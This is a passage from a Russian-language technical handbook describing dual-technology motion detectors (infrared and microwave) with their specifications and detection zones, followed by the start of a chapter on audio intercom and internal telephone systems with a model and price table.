В приборе, предназначенном для установки на потолке , в одном корпусе находятся инфракрасный пассивный детектор с зоной обнаружения 360 и уникальный радиоволновый детектор. Прибор может быть установлен на поверхности потолка или заподлицо с ней при помощи специального кронштейна. Высота установки может меняться от 2ю5м при использовании стандартного до 5 м со специальным зеркалом,входящим в комплект поставки прибора. При этом число лучей детекции ПИК датчика изменяется от 72 до 61 (рис. 3.23).
Применение в детекторах движения комбинации пассивной ИК и микроволновой технологий делает приборы фирмы Dual Tec более надежными, чем другие, построенные с использованием только одной технологии регистрации движения. В то же время эти приборы используют метод «последовательных сигналов», с помощью которого исключается сигнал тревоги в случае, если после регистрации движения радиоволновым датчиком не последует подтверждение этого факта от инфракрасного датчика, регистрирующего изменение температуры, или наоборот. Это также способствует уменьшению вероятности ложных срабатываний. Радиоволновый детектор включается только после
Высота установки |
Внешняя окружность |
Средняя окружность |
Внутренняя окружность |
Центр |
|||
А |
В |
С |
D |
Е |
F |
Q |
|
2. 4м |
7, 7м |
5, 7м |
3. 6м |
2, 7 м |
1. 7м |
1. 3 м |
0. 5м |
2. 7м |
9, 6 м |
7. 1 м |
4. 5м |
3. 4м |
2, 1 м |
1, 6 м |
0, 6м |
3, 3м |
13, 4м |
10, 0м |
6. 3м |
4. 8м |
3, 0м |
2, 3м |
0, 9м |
Высота установки |
Внешняя окружность |
Внутренняя окружность |
Центр |
||
А |
В |
С |
D |
Е |
|
3. 6м |
6, 0м |
4, 8м |
3. 7м |
2. 5м |
0. 7м |
4, 2м |
7, 5м |
6, 1 м |
4, 6м |
3, 1 м |
0. 9м |
4, 8м |
9. 0м |
7, 3м |
5, 5м |
3. 8м |
1, 0м |
Рис. 3. 23. Зоны обнаружения приборов DT5360, DT6360STC
обнаружения движения инфракрасным детектором, который находится во включенном состоянии непрерывно. В детекторе DT5360, в отличие от детектора DT6360STC, радиоволновый и ИК каналы работают непрерывно.
Основные технические характеристики приборов DT5360 и DT6360STC:
Радиус обнаружения ПИК детектора, м............................................... 15
Устойчивость к радиопомехам на частоте 10—1000 МГц, В/м............... 30
Рабочая частота радиоволнового источника:
DT5360, ГГц.................................................................... 9, 9-10, 687
DT6360STC, ГГц..................................................................... 10, 525
Выходные реле:
реле тревоги, мА/ В.............................................................. 100 / 30
реле вмешательства, мА/В...................................................... 25/30
Напряжение питания, В............................................................. 8, 5—16
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 40
Диапазон рабочих температур, С.................................... от -18 до+ 64, 6
Габаритные размеры, мм....................................................... 127х 127х57
Масса:
DT5360, г................................................................................... 213
DT6360STC, г.............................................................................397
Для проверки работоспособности детектора имеется перемычка W4, установив которую, можно отключить радиоволновую часть прибора. После окончания проверки детектора эта перемычка убирается.
Детекторы предназначены для охраны жилых помещений, офисов и других закрытых помещений.
Особенности детектора DT6360STC:
> улучшенная микропроцессорная обработка сигналов;
> радиоволновая и ПИК технологии обнаружения;
> встроенные системы контроля и диагностики;
> запуск самодиагностики по команде микропроцессора;
> возможность установки на подвесном потолке.
Детектор серии DT6360STC (рис. 3. 22) использует сочетание круговых диаграмм направленности пассивного ИК и радиоволнового детекторов. Сигналы, поступающие от этих детекторов, постоянно анализируются и раздельно классифицируются для выделения характеристик нарушителя. Длительность и последовательность их прихода анализируется в соответствии с установленными значениями параметров алгоритма обработки для оптимизации эффективности обнаружения и устойчивости к ложным срабатываниям.
Встроенные системы контроля и диагностики позволяют быстро обнаружить, определить и скорректировать неисправности. Микропроцессор автоматически запускает серию проверок работоспособности прибора при подаче напряжения питания, периодически во время работы и при обнаружении неисправности. Автоматическая цепь контролирует радиоволновый детектор, При потере сигнала микропроцессор выполняет самотестирование и прибор переходит на работу с использованием только ПИК детектора.
3. 3. 2. Детекторы движения серии 8100S
Детекторы движения серии 8100S компании С&К используются тогда, когда требуется обеспечить надежную охрану в неблагоприятных условиях окружающей среды. Прочный корпус (рис. 3. 24) и высокая устойчивость работы позволяют использовать детектор в промышленных условиях. Максимальная дальность действия детектора 8120S достигает 61 м, что делает его идеальной альтернативой активным инфракрасным детекторам.
Рис. 3. 24. Детектор 8110S
Особенности детекторов серии 8100S:
> контроль работоспособности;
> комбинация ПИК и радиоволнового детекторов;
> высокая чувствительность;
> высокая помехоустойчивость
> ударопрочный стальной корпус;
> непрерывная работа радиоволнового и ПИК детекторов.
Детекторы движения серии 8100S используют пассивную ИК и микроволновую технологии, которые обеспечивают необходимую помехоустойчивость, чувствительность и стабильность работы приборов в целом. Детекторы 8110S и 8120S имеют узкую диаграмму направленности, a8140S — широкую (рис. 3. 25). Соотношение размеров зон обнаружения при установке детектора на высоте 3, 65 м приведены в табл. 3. 2. Детектор 8140S имеет 19 лучей детекции, образующих дальнюю (11 лучей), промежуточную (5 лучей) и ближнюю (3 луча) зоны обнаружения, а детектор 8120S — 9 лучей детекции, образующих дальнюю (1 луч), промежуточную (5 лучей) и ближнюю (3 луча) зон соответственно.
Рис. 3. 25. Зоны обнаружения детекторов серии 8100S
Основные технические характеристики приборов серии 8100S:
Размер зоны обнаружения, м:
8140S..................................................................................... 2.7х21
8110S...................................................................................... 37х3
8120S...................................................................................... 61х5
Рабочая частота микроволнового источника, ГГц........................ 9—10, 687
Устойчивость к радиопомехам на
расстоянии 3 м при частоте 27— 1000 МГц, В/м................................. 100
Напряжение питания, В........................................................... 5, 5—16, 0
Потребляемый ток (при напряжении питания+ 12 В), мА...................... 35
Выходные реле:
реле тревоги................................................................ трехполюсное
реле вмешательства...................................................... двухполюсное
реле неисправности...................................................... трехполюсное
Габаритные размеры,мм..................................................... 210x110x142
Масса, кг....................................................................................... 2, 75
Таблица 3. 2 Размеры зон обнаружения детекторов серии 8100S (к рис. 3. 25)
Модель |
Высота установки, м |
Длина, м |
Ширина, м |
||
Х |
А |
В |
С |
Y |
|
8140S |
3, 65 |
27 |
11 |
4 |
21 |
8110S |
3, 65 |
37 |
9 |
4 |
3 |
8120S |
3, 65 |
61 |
12 |
4 |
5 |
Детекторы имеют запатентованную цепь «Информер», которая используется для'контроля работоспособности прибора. При сопоставлении сигналов от обоих детекторов неоднозначность в их показаниях может означать, что один из датчиков блокирован или неисправен. Сравнивая количество несоответствий (четыре возможных варианта), цепь «Информер» фиксирует неисправность детектора и выдает соответствующее извещение (выходное реле неисправности).
Неисправность детектора может быть определена пользователем на месте (мигание красного светодиода) или по информации, передаваемой на контрольную панель при помощи специального, не входящего в комплект поставки, реле.
Детекторы движения серии 8100S выполнены в стальном корпусе совместно с реле вмешательства, что позволяет использовать их в сложных производственных и природных условиях.
3. 3. 3. Детекторы движения серии DT400
Детекторы движения серии DT400 основаны на использовании двойной технологии — пассивной ИК и радиоволновой, что обеспечивает высокую чувствительность и стабильность работы приборов. Детекторы могут использоваться как в жилых, так и в производственных помещениях. Благодаря современному дизайну корпуса, они вписываются в любой интерьер. Внешний вид детекторов DT400T и DT400S представлен на рис. 3. 26, а и б.
Рис. 3. 26. Детекторы DT400T (а) и DT400S (б)
Особенности детекторов серии DT400:
> двойная технология;
> высокая чувствительность;
> расширенная зона обнаружения;
> контроль работоспособности радиоволнового детектора;
> регулируемая дальность обнаружения;
> защищенность от радиопомех;
> современный дизайн.
Так как в приборах сравниваются сигналы тревоги ПИК и радиоволнового детекторов, практически полностью исключаются ложные срабатывания. Это существенно увеличивает помехоустойчивость приборов, по сравнению с детекторами, использующими для регистрации вторжения в охранную зону только одну технологию. В приборах непрерывно работает ПИК детектор, который в случае обнаружения движения включает радиоволновый детектор.
При помощи оригинального многосегментного зеркала и линзы Френеля лучи детекции имеют большую длину, некоторые из них направлены непосредственно вниз, образуя нижнюю зону (рис. 3. 27). Это уменьшает возможность стороннего нарушения работоспособности детектора. Зона обнаружения инфракрасного детектора содержит 23 луча детекции, образующих дальнюю (9 лучей), промежуточную (6 лучей), ближнюю (5 лучей) и нижнюю (3 лучей) зоны. Размеры зон обнаружения приведены в табл. 3. 3.
Основные технические характеристики приборов серии DT400:
Частота излучения, ГГц....................................................... 9, 47—10, 687
Устойчивость к радиопомехам на
расстоянии 3 м в диапазоне 27— 1000 МГц, В/м................................. 100
Количество лучей детекции................................................................ 23
Рис. 3. 27. Зоны обнаружения приборов серии DT400
Напряжение питания, В............................................................ 10, 5— 16
'Ток потребления (при напряжении питания +12 В), мА ........................30
Диапазон рабочих температур, С...................................... от -18 до+ 60
Габаритные размеры, мм........................................................ 70х60х130
Масса, кг....................................................................................... 0, 36
Таблица 3. 3. Размеры зон обнаружения детекторов серии DT400
Модель |
Высота установки, м |
Длина, м |
Ширина, м |
|||
Х |
А |
В |
С |
D |
Y |
|
420Т |
2, 30 |
8 |
6 |
3 |
0, 30 |
6 |
435Т |
2, 30 |
11 |
8 |
4 |
0, 30 |
9 |
450Т |
2, 30 |
14 |
11 |
6 |
0, 30 |
12 |
440S |
2, 30 |
12 |
10 |
4, 50 |
0, 30 |
12 |
460S |
2, 30 |
18 |
15 |
6 |
0, 30 |
18 |
Детекторы серии DT400 являются идеальным решением задачи охраны в тех условиях, где приборы, выполненные по одинарной технологии, не в состоянии справиться. Компактный внешний вид приборов и встроенное реле вмешательства позволяют использовать их как в жилых, так и в производственных помещениях. Детекторы осуществляют непрерывный контроль за состоянием радиоволнового датчика и формируют соответствующий сигнал путем размыкания контактов выходного реле в случае нарушения их работы.
Модификации детекторов DT4201, DT4351 и DT4501 выпускаются по лицензии фирмы С&К в г. Рязани совместно с Главным Управлением вневедомственной охраны.
Детектор устанавливается на стену при помощи поворотного кронштейна типа DT4SW, а на потолок — с помощью кронштейна типа DT4SM.
Детекторы серии «S» имеют запатентованную цепь "Информер", предназначенную для индикации состояния блокировки прибора или при выходе его из строя. Информация о неисправности прибора может отображаться на месте при помощи светодиодного индикатора или быть передана по шлейфу сигнализации на контрольную панель.
3. 3. 4. Детекторы движения серии DG1000
Детекторы движения серии DG1000 (рис. 3. 28) для увеличения чувствительности и исключения ложных срабатываний построены по двойной технологии. Приборы могут использоваться в жилых, а также в производственных помещениях с повышенными требованиями к безопасности.
В детекторах используется комбинация пассивного И К и радиоволнового датчиков. Алгоритм работы этих устройств практически полностью исключает возможность ложной тревоги.
Особенности детекторов серии DG1000:
> И К и радиоволновая технологии;
> уникальная оптическая система;
> температурная компенсация;
> защита от радиопомех;
> оптические линзы;
> расширенная зона обнаружения.
Детекторы имеет 24 луча, образующих дальнюю (11 лучей), промежуточную (7 лучей), ближнюю (4 луча) и нижнюю (2 луча) зоны (рис. 3. 29). Размеры зон обнаружения приведены в таблице на рис. 3. 29. Основные технические характеристики:
Размер зоны обнаружения:
DG1035. M................................................................................ 11х9
DG1050. M............................................................................... 15х12
Рабочая частота микроволнового источника, ГГц................................ 2, 45
Устойчивость к радиопомехам в диапазоне 10— 10000 МГц, В/м........... 30
Напряжение питания, В.............................................................. 10—14
Ток потребления (при напряжении питания+ 12 В), мА........................ 35
Диапазон рабочих температур,С...................................... от -10 до +49
Габаритные размеры, мм........................................................ 130х70х40
Масса, кг....................................................................................... 0,17
Рис. 3. 29. Зоны обнаружения приборов серии DG1000
3.3.5. Комбинированные детекторы фирмы Arrowhead
Детекторы движения фирмы Arrowhead, включающие в себя радиоволновый и пассивный И К датчики, представлены на российском рынке моделями серии 1000. Они имеют современный дизайн, сочетающийся с любым интерьером помещения и высокие характеристики обнаружения. Внешний вид приборов и их технические характеристики приведены в табл. 3.4.
3.3.6. Извещатели объемные радиоволновые «Аргус-2» и «Волна-5»
Охранные извещатели отечественного производства «Аргус-2», "Волна-5" предназначены для регистрации факта проникновения в охраняемое пространство закрытого помещения и формирования тревожного извещения. Оба извещателя рекомендованы для использования ГУВО МВД РФ. Извещатели устанавливаются на стене охраняемого помещения (рис. 3.30). Особенности извещателей:
> высокая степень обнаружения;
> отсутствие ложных срабатываний, даже в помещениях с интенсивной вентиляцией;
> возможна эксплуатация нескольких извещателей в одном помещении (4 частотные литеры);
> регулируемая дальность действия;
> индикация помех.
Извещатель "Волна-5" не требует отдельного источника питания. Питание осуществляется по шлейфу приемно-контрольного прибора или от систем «Фобос», «Нева». Извещатели "Аргус-2" и «Волна-5» имеют зону обнаружения площадью около 90 м2 и контролируют объем до 200 м3 (рис. 3.31).
Основные технические характеристики извещателей «Аргус-2» и «Волна-5».
Дальность действия;
максимальная, м..................................................................... 12—16
минимальная, м.........................................................................2—4
Площадь зоны обнаружения, м2........................................................... 90
Контролируемый объем, м3 ............................................................... 200
Напряжение питания, В:
"Аргус-2" ............................................................................... 2 - 12
Таблица 3.4. Комбинированные детекторы фирмы Arrowhead
Рис. 3.31. Схема зон обнаружения извещателей «Аргус-2» и «Волна-5»
"Волна-5" (по шлейфу) ......................................................... 12—72
Потребляемый ток, мА:
"Аргус-2" ...............................................................................2-30
«Волна-5» ................................................................................ 5 — 2
Диапазон рабочих температур, С ...................................... от -30 до +50
Габаритные размеры, мм .......................................................... 98х85х62
Масса, кг..................................................................................... 0,250
Тревожное извещение «Аргус-2» формирует путем размыкания контактов выходного исполнительного реле, а извещатель "Волна-5" — путем изменения тока обтекания шлейфа.
3.3.7. Объемный радиоволновый детектор «Аргус-3»
Охранный объемный радиоволновый детектор "Аргус-3" предназначен для обнаружения проникновения в охраняемое пространство закрытого помещения малого объема и формирования тревожного извещения путем размыкания контактов выходого исполнительного реле. Прибор выполнен на современной элементной базе и имеет прекрасный дизайн. Несколько вариантов крепления прибора позволяют устанавливать его практически в любом месте помещения.
Особенности извещателя «Аргус-З». > высокая степень обнаружения проникновения в зону охраны;
> отсутствие ложных срабатываний, даже в помещениях с интенсивной вентиляцией;
> эксплуатация нескольких извещателей в одном помещении (2 частотных литеры);
> регулировка дальности действия;
> индикация помех.
Датчик "Аргус-3" имеет узкую диаграмму направленности в горизонтальной и вертикальной плоскости (рис. 3. 32).
Рис. 3. 32. Зона обнаружения детектора «Аргус-3»
Основные технические характеристики прибора:
Дальность действия:
максимальная, м...................................................................... 6 — 7, 5
минимальная, м......................................................................... 2—3
Площадь зоны обнаружения, м2........................................................... 20
Напряжение питания, В............................................................ 10, 2—15
Потребляемый ток, мА....................................................................... 30
Диапазон рабочих температур, С...................................... от -10 до+ 50
Габаритные размеры, мм.......................................................... 90х75х40
3.3.8. Детектор движения наружного применения PIRAMID ЕН
Детектор движения PIRAMID EH (Passive InfraRed And Microwave Intruder Detector) — это продукция компании Protection Technologies Inc., впервые поставляемая в Россию. PIRAMID EH (рис. 3. 33) — это детектор движения, использующий двойную технологию: комбинированный радиоволновый и двойной пассивный инфракрасный датчики. Он надежно работает в широком диапазоне внешних условий и используется для наружного применения. Особенности детектора PIRAMID EH:
> двухканальный доплеровский радиоволновый датчик;
> двойной пассивный ИК датчик;
> температурная компенсация пассивного ИК детектора;
> 6 уровней чувствительности радиоволнового детектора;
> 2 уровня чувствительности для пассивного ИК детектора;
> раздельная регулировка дальности действия радиоволнового и пассивно го И К датчиков;
> сменные линзы для пассивного ИК детектора;
> двухуровневая светодиодная индикация.
Главным фактором, обеспечивающим надежность прибора, является применение уникального двухканального доплеровского радиоволнового детектора. Этот детектор выполняет свои функции гораздо лучше, чем обычный радиоволновый детектор, т. к. он игнорирует такие источники ложных срабатываний, как различные вибрации и случайные перемещения объектов. Кроме того, этот прибор позволяет устанавливать дистанцию до движущегося объекта, при которой должна происходить тревога.
Выпускается несколько моделей PIRAMID, в которых используются различные линзы, обеспечивающие необходимую зону обнаружения. На отечественный рынок поступают три базовые модели: SDI-76EH, SDI-77EH, SDI-77EH1. Каждая модель имеет фиксированную зону обнаружения, которая определяется стандартной линзой. Модель SDI-76EH оснащена линзой типа А, которая обеспечивает максимальную площадь (15х15 м) зоны обнаружения (рис. 3. 34).
Модель SDI-77EH оснащена стандартной линзой типа С1 («широкий угол»), обеспечивающей, для данной модели, зону обнаружения размером 30х4, 5 м. Модель SDI-77EH1 с той же линзой типа С1 перекрывает зону размером 45х6 м.
Уникальная комбинация высокоэффективного радиоволнового двухканального с термостабилизацией и двухэлементного пассивного ИК датчиков позволяет получить прибор с очень высокими характеристиками обнаружения при низкой вероятности ложных тревог. Двухуровневая светодиодная индикация режимов работы прибора по каждому из каналов (различные варианты включения светодиодов) обеспечивает дистанционный контроль за функционированием детектора.
Основные технические характеристики приборов PIRAMID EH:
Максимальная дальность действия:
SDI-76EH/SDI-76EHV.M......................................................... 15х15
SDI-77EH/SDI-77EHV.M........................................................ 30х4,5
SDI-77EH1/SDI-77EH1V, м ...................................................... 45х6
Количество уровней чувствительности:
радиоволнового детектора............................................................... 6
инфракрасного детектора ............................................................... 2
Напряжение питания, В .............................................................. 10—20
Диапазон рабочих температур, С...................................... от -34 до+ 54
Высокие технические характеристики прибора, металлический ударопрочный и герметичный корпус позволяют использовать его практически в любых условиях окружающей среды.
Детектор широко используется для охраны периметров различных объектов, крыш зданий, строительных площадок, автостоянок и других объектов.
Рис. 3. 34. Схема лучей детекции модели SDI-76EH
Популярным стало использование детектора движения PIRAMID ЕН со встроенной видеокамерой в составе систем видеонаблюдения. Детектор включает видеокамеру и сигнал тревоги при регистрации движущегося объекта в зоне охраны. Детекторы Р I РАМ ID EH со встроенной видеокамерой имеют обозначение EHV (V - Video).
Глава 4. АУДИО- И ВИДЕОДОМОФОННЫЕ УСТРОЙСТВА И СИСТЕМЫ.
4. 1. Аудиодомофонные устройства и системы связи
В последнее время для ограничения доступа посторонних лиц в квартиры, дачи, подъезды многоэтажных домов, офисов, банков, магазинов, предприятий и медицинских учреждений применяют аудиодомофонные устройства. Эти устройства имеют современный дизайн, высокое качество воспроизведения звука и обладают широкими функциональными возможностями. Как правило, такие устройства строятся по модульному принципу, что позволяет гибко изменять конфигурацию системы и подключать дополнительных пользователей. Современные аудиодомофонные устройства, или, как их еще называют, переговорные устройства, состоят из наружной и внутренней частей.
Наружная часть устройства устанавливается перед входной дверью и представляет собой панель из алюминия, стали или пластика с кнопками вызова, микрофоном, громкоговорителем и лампочкой подсветки. В некоторых переговорных устройствах для контроля набираемого кода имеется встроенный цифровой индикатор. В комплект поставки всех аудиодомофонных устройств входит дверной электрозамок или дверная электрозащелка.
Внутренняя часть переговорного устройства содержит одну или несколько телефонных трубок с кнопкой дистанционного открывания дверного электрозамка и источник питания для организации аудиодомофонной связи и управления замком.
Рассматриваемые в данном разделе аудиодомофонные устройства имеют следующие особенности:
> возможность регулировки громкости звука как наружной, так и внутренней части домофона;
> тип вызывного сигнала — тоновый или «трель»;
> проводное соединение переговорных частей;
> возможность увеличения числа пользователей;
> дистанционное открывание двери путем нажатия специальной кнопки;
> возможность подключения к внешней телефонной линии.
Все аудиопереговорные устройства зарубежного производства полностью адаптированы к отечественным телефонным линиям. Некоторые из них имеют встроенный считыватель (клавиатурный или с кодовыми ключами), что позволяет осуществить построение двухуровневой системы ограничения доступа.
Современные аудиодомофонные устройства могут выполнять функции охранной системы с формированием звукового сигнала тревоги и его протоколирования на регистрирующем устройстве. При использовании дополнительного адаптера внешней телефонной линии имеется возможность организовать оперативную связь между сотрудниками учреждения и внешними абонентами. Модульное исполнение отдельных блоков большинства аудиодомофонных устройств позволяет изменять конфигурацию системы и наращивать число внутренних пользователей до 2000 и более. При этом обеспечивается полная совместимость обычного телефонного аппарата с цифровыми сигналами аудиодомофонных систем.
Рис. 4. 1. Возможная конфигурация современной аудиодомофоннои системы
Рассматриваемые аудиодомофонные устройства могут включать в себя различные функциональные модули (рис. 4. 1): наружную переговорную панель с кнопочными клавишами и системой отображения набранного кода; переговорную трубку для осуществления связи с сотрудниками учреждения и посетителями с индикацией и кнопками управления. Кнопки управления могут выполнять следующие функции:
> открытие/закрытие входной двери;
> отключение звукового сопровождения;
> включение резервного источника питания и другие сервисные функции.
В аудиодомофонной системе можно использовать многофункциональный телефонный аппарат, предназначенный для первичного разговора с посетителем, для подключения требуемого внутреннего пользователя и управления функциями аудиодомофонного устройства. Телефонный интерфейс системы выполняет функции внутренней телефонной станции и обеспечивает коммутацию внутренних телефонов с одной или несколькими внешними линиями.
4. 1. 1. Системы внутренней телефонной связи
Системы внутренней телефонной связи могут устанавливаться в зданиях любой архитектуры и назначения (жилых, производственных помещениях) для организации эффективной и недорогой телефонной связи как внутри помещения, так и для связи с наружной панелью у входной двери. Основой такой системы являются электронные телефонные аппараты различных модификаций, обладающие следующими свойствами:
> для сигнала вызова и ведения разговоров используется динамическая головка телефонной трубки;
> для управления электрозамком входной двери используется специальная кнопка на телефонном аппарате — ключ открывания двери;
> для системы внутренней телефонной связи используется общий источник
питания и генератор вызывных и тональных сигналов. Телефоны внутренней связи выпускаются в различных модификациях (рис. 4. 2). Телефонные трубки с одной кнопкой (ключом открывания входной двери) предназначены
для ведения телефонного разговора и управления электрозамком входной двери.
Телефоны с двумя кнопками (ключом открывания двери и сервисной клавишей) имеют то же назначение, что и рассмотренные ранее. Сервисная клавиша может использоваться для включения света или открывания второго замка. Телефонные трубки с двумя кнопками и двумя светодиодными индикаторами обеспечивают:
> световую индикацию незапертых дверей или ворот;
Рис. 4. 2. Телефонные переговорные трубки с одной кнопкой
> отключение звукового сигнала вызова;
> соединение с внешней городской автоматической телефонной станцией (ГТС);
> временное отключение электрозамка на входной двери, например, в меди цинских учреждениях в рабочие часы.
Телефоны с одной кнопкой (ключом открывания двери) и дополнительной клавишной панелью (рис. 4. 3), как правило, используются для:
> световой индикации незапертых дверей или ворот;
> индикации включения освещения площадки у входной двери;
> временного отключения электрозамка на входной двери;
> включения/выключения звукового сигнала вызова;
> индикации включения резервного питания;
> выполнения вспомогательных функций при помощи сервисной клавиши.
Для организации оперативной внутренней связи между пользователями можно использовать различные сетевые схемы включения телефонных аппаратов. Один из возможных вариантов сети внутренней связи с использованием продукции фирмы Commax приведен на рис. 4. 4.
Применение телефонных интерфейсов (рис. 4. 5), например типа РАВХ 1/5 или РАВХ 2/8, позволяет существенно расширить функциональные возможно-
Рис. 4. 3. Телефонная переговорная трубка с клавишной панелью
сти внутренней связи. Так, телефонный интерфейс РАВХ 2/8 обеспечивает надежную связь не только между 8 пользователями внутренней связи, но и позволяет коммутировать их на две внешние линии.
Цифровая технология, используемая в телефонных интерфейсах, позволяет создавать гибкую систему управления внутренней телефонной связью с широкими функциональными возможностями. В общем случае, телефонный интерфейс выполняет функции, присущие любой мини-АТС:
> позволяет подключать обычный телефонный аппарат внутренней связи к цифровым системам домофонной связи;
Рис. 4. 4. Вариант сети внутренней связи
Рис. 4. 5 Телефонный интерфейс РАВХ 2/8
> поддерживает передачу по проводам не только звуковых, но и видеосигналов;
> поддерживает связь внутренней телефонной сети с внешней линией городской АТС;
> осуществляет автоматическое соединение каждого внутреннего абонента с другими путем набора номера на телефонном аппарате;
> поддерживает передачу управляющих сигналов на электрозамок входной двери или ворот, а также по желанию пользователя на вспомогательные устройства, например на выключатель ламп освещения прихожей или лестничной площадки;
> позволяет наращивать систему путем простого добавления дополнительных компонентов.
К интерфейсу можно подключить дополнительные внутренние телефоны. Он поддерживает подключение до 4 аудио- или видеодомофонов различной конфигурации и способен объединять цифровые и аналоговые домофоны в единую внутреннюю телефонную сеть. В таких системах, как правило, выход в линию городской АТС осуществляется путем набора номера внешнего абонента на комбинированном телефонном аппарате (рис. 4. 6).
Комбинированный телефонный аппарат, кроме клавиш для организации внутренней и внешней телефонной связи, имеет дополнительные, которые существенно расширяют его функциональные возможности:
> включение освещения в прихожей или на лестничной площадке;
> подключение к многофункциональному телефонному аппарату;
> включение встроенной в аппарат громкоговорящей связи;
> управление электрозамком входной двери;
> автоматический сброс набранного номера;
> включение автодозвона набранного номера и др.
Вызов пользователя внутренней телефонной связи с городской АТС осуществляется, как правило, через многофункциональный телефонный аппарат (рис. 4. 7).
Оператор многофункционального телефонного аппарата обеспечивает не только коммутацию внешних и внутренних абонентов, но и управляет организацией всей внутренней телефонной связи. Многофункциональный телефонный аппарат поддерживает выполнение следующих функций:
> уведомляет внутреннего пользователя о входящем внешнем вызове;
> подключает внешнюю городскую линию АТС к любому внутреннему аппарату;
> осуществляет контроль и передачу посылки вызова на любой телефонный аппарат внутренней связи;
> поддерживает режим ожидания (освобождения) внешней городской линии;
> осуществляет одновременный или выборочный вызов внутренних пользователей (режим «директор-секретарь»);
> управляет электрозамком входной
двери и освещением в прихожей или на лестничной площадке;
> программирует коды системы ограничения доступа, если она используется;
> осуществляет диагностику причин отказов системы и отключает неисправные телефонные аппараты внутренней связи.
Многофункциональный телефонный аппарат выполняет ряд дополнительных сервисных функций:
> изменение номера внутреннего пользователя;
> передачу соединения другому внутреннему пользователю;
> выход только на многофункциональный телефонный аппарат;
> консультацию и удержание линии;
> ограничение времени исходящего междугородного телефонного разговора;
> тарификацию международного телефонного разговора;
> выход на определенную городскую линию АТС.
4. 1. 2. Проводные аудиодомофонные устройства
В настоящее время на российский рынок поставляется большое количество разнообразных аудиодомофонных устройств, в основном, из Италии, Испании, Южной Кореи. Достаточно широко представлены и домофоны отечественного производства. Все эти устройства отличаются широкими функциональными возможностями, оригинальным дизайном, надежностью и удобством монтажа. Они строятся, как правило, по модульному принципу, что позволяет подобрать требуемую конфигурацию системы.
Так, например, фирма Commax (Южная Корея) занимает одно из ведущих мест в данной области и предлагает широкий ассортимент домофонных устройств, обеспечивающих контроль входа и автономную телефонную связь в помещениях различного назначения. Устройства этой фирмы пригодны как для частных квартир, так и для больших учреждений и полностью адаптированы к отечественным условиям, а модульное исполнение обеспечивает любую степень расширения. Эти изделия имеют:
Рис.4.8 Наружные панели домофонов фирмы Commax
Рис. 4. 9. Квартирные телефонные аппараты
> оригинальные наружные панели домофонов (некоторые из них приведены на рис. 4. 8);
> телефонные аппараты и электронные компоненты систем ограничения доступа для 1 —4 входов (рис. 4. 9);
> микро-АТС с необходимым набором сервисных функций (рис. 4. 10);
> специальные переговорные устройства для банков, касс и офисов;
> врезные или накладные замки с дистанционным управлением. Особенности:
> качество оборудования соответствует стандарту ЕЭС и национальному стандарту Российской Федерации;
> применение цифрового кода длиной 1—6 знаков обеспечивает полную анонимность пользователя;
> с помощью набора специальных кодов системы могут управлять несколькими исполнительными механизмами, например замками входных дверей, ворот, включать аварийную сигнализацию, освещение и т. д.;
> устройства имеют защиту от продолжительного звонка, например при
заклинивании кнопки.
При использовании дополнительных никель-кадмиевых аккумуляторов и зарядного устройства, поставляемых по специальному заказу, устройства могут работать автономно.
Перечислить все изделия фирмы Commax не представляется возможным из-за чрезвычайно широкого их ассортимента. Аналогичные примеры можно привести
Рис. 4. 10. Микро-АТС с набором сервисных функции
и по другим фирмам, занимающимся системами ограничения доступа в жилые и служебные помещения. Характеристики некоторых из них приведены в табл. 4. 1.
Кроме того, фирма Commax поставляет на российский рынок комплектующие изделия к аудиодомофонам модульного исполнения, что позволяет выбирать необходимую конфигурацию и наращивать количество кнопок вызова. Так, к базовой модели DP-MSS/DR-nKM она предлагает семь моделей различных дополнительных панелей (на 4, 8, 12, 14, 16 кнопок) и устройство ТР-6АС/12АС для обеспечения внутренней связи между абонентами в офисах и учреждениях.
Рассмотренные выше домофоны предназначены, в основном, для многоквартирных домов, больших офисов и организаций.
В последнее время все большее внимание уделяется вопросам охраны небольших офисов, отдельных квартир, дач и т. п. Зарубежные фирмы, имеющие большой опыт в данной области, предлагают широкий ассортимент аудиодомофонных устройств индивидуального использования. Данные устройства (рис. 4. 11, 4. 12) обладают прекрасным дизайном, выполнены на современной электронной базе, просты в эксплуатации и надежны в работе.
Таблица 4. 1. Аудиопереговорные устройства
Наименование переговорного устройства |
Фирма-изготовитель (страна) |
Кол-во тлф. трубок |
Основные параметры |
Примерная цена, USD |
Digidue модель 1037 |
Urmet Domus (Италия) |
5-112 |
Цифровая двухпроводная система |
470-1887 |
Kombi модель 825 |
Urmet Domus (Италия) |
1-34 |
Kombi, набор различных модулей |
75-610 |
Easivice модель 926 |
Urmet Domus (Италия) |
2-97 |
Программирование 12-ти кнопочного телефонного аппарата |
162-5009 |
Kombi модели 7771 — 7774 |
Urmet Domus (Италия) |
1-40 |
Число кнопок на наружной панели по количеству пользователей |
103-687 |
Citoset модели 1130— 1131 |
Urmet Domus (Италия) |
1-2 |
Системы индивидуального пользования частных квартир |
Данных нет |
Puntovirgola модель 1PV-2PVD |
Farfisa (Италия) |
1-2 |
Панель из анодированного алюминия с кнопками вызова |
73-98 |
Famly Kit модели 1к — 6к |
Farfisa (Италия) |
1-6 |
Панель из анодированного алюминия с кнопками вызова |
58-195 |
Minikit модели М911-912 |
Videx (Италия) |
1-2 |
Стальная панель с кнопками вызова |
55-69 |
Entrikit модели Е 911 - 912 |
Videx (Италия) |
1-2 |
Стальная панель с кнопками вызова |
63-77 |
Digi phone Kit модель DK918 |
Videx (Италия) |
1 |
Длина кодового слова 3—6 цифр |
180 |
Keyphone Kit модели P947-947S |
Videx (Италия) |
1 |
3—9 кодовых ключей |
182 |
City Kit( 1-6) LINE |
Fermax (Испания) |
1-6 |
Панель из анодированного алюминия с кнопками вызова |
147-294 |
Kit Multiway |
Fermax (Испания) |
2-4 |
Панель из анодированного алюминия с кнопками вызова |
220-285 |
Memophone Kit модели 1L1 — 2L2 |
Fermax (Испания) |
1-2 |
Длина кодового слова 1 - 6 цифр |
367-415 |
Рис. 4. 11. Аудиодомофон индивидуального пользования, с регулировкой чувствительности
Рис. 4. 12. Аудиодомофон индивидуального пользования для квартир, дач и офисов
4. 1. 3. Беспроводные домофонные системы связи
